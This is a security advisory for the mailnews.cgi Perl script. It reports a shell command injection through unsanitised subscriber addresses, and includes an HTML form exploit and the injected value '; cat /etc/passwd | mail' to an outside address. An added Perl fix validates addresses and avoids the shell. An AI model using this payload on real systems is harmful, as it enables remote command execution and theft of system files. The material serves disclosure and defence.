Vulnerability
mailnews.cgi
Affected
mailnews.cgi 1.1, 1.3
Description
Kanedaaa Bohater found the following. The author doesn't parse some
characters and uses a very stupid "password protection". We can
add or delete users from the mailing list without knowing the admin password.
But this is a small problem. Let's see what more we can do.
open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
where $mailprog [default] is sendmail and $member holds the users read
from the usersfile. Now we can do something like this: add the user "; cat
/etc/passwd | mail adam@malysz.pl" and use the subroutine to execute
this code.
Simple exploit in HTML:
<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ; [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
without quotes, of course ]<INPUT NAME="address" TYPE="TEXT">
<INPUT TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>
Solution
Nothing yet.
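The open() call quoted in the description hands "$mailprog $member" to a shell, so any shell metacharacter stored in the usersfile is interpreted. The following is an added example, not code from mailnews.cgi or from the advisory, showing the same send step with an allow-list check and a list-form pipe open that bypasses the shell. The sendmail path, the helper names valid_address and send_to_member, and the sample entries are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not mailnews.cgi source. Names other than $mailprog and
# $member are assumptions made for illustration.
use strict;
use warnings;

my $mailprog = '/usr/sbin/sendmail';   # assumed path; the page only says "sendmail"

# Allow-list check, applied when an address is subscribed AND again when it
# is read back from the usersfile, since the file itself is untrusted input.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    # local@domain built only from characters that mean nothing to a shell;
    # a leading '-' is refused so the value cannot be taken as an option.
    return $addr =~ /\A[A-Za-z0-9_][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/
        ? 1 : 0;
}

# List-form pipe open: Perl executes $mailprog directly, so no shell ever
# parses $member. '--' ends option processing before the recipient
# (assumes a sendmail-compatible binary that honours '--').
sub send_to_member {
    my ($member, $subject, $body) = @_;
    die "rejected address\n" unless valid_address($member);
    $subject =~ s/[\r\n]+/ /g;          # keep the subject on one header line
    open(my $mail, '|-', $mailprog, '-oi', '--', $member)
        or die "Can't run $mailprog: $!\n";
    print {$mail} "To: $member\nSubject: $subject\n\n$body\n";
    close($mail) or die "$mailprog exited with status $?\n";
}

# Constructed sample entries, including the string quoted in the advisory.
# Only the validator runs here; no mail is sent.
for my $entry ('reader@example.org',
               '; cat /etc/passwd | mail adam@malysz.pl',
               '-froot@example.org') {
    printf "%-45s %s\n", "[$entry]",
        valid_address($entry) ? 'accepted' : 'rejected';
}
```

Either control alone leaves a gap: validation without the list-form open still trusts the regex completely, and the list-form open without validation still lets option-like or malformed recipients reach the mailer.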